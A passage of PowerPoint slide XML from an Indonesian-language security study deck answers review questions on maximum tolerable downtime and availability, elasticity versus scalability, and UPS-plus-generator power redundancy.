              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ISO 22301, PCI DSS, dan SOC 2.</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165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186704263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1. How does MTD relate to availability?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>MTD (Maximum Tolerable Downtime) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Availability = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>MTD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merencanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>disaster recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>business continuity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTO (Recovery Time Objective).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MTD, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> availability yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. How does elasticity differ from scalability?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Elasticity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (naik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>turun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Scalability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tumbuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>memperbesar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Elasticity = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud computing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> autoscaling VM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Scalability = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Singkatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>elasticity = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, real-time; scalability = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. Which two components are required to ensure power redundancy for a power loss period extending over 24 hours?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>UPS (Uninterruptible Power Supply) + Generators.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>UPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabilisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>padam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>–jam).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 24 jam (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>continuity of operations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menutupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
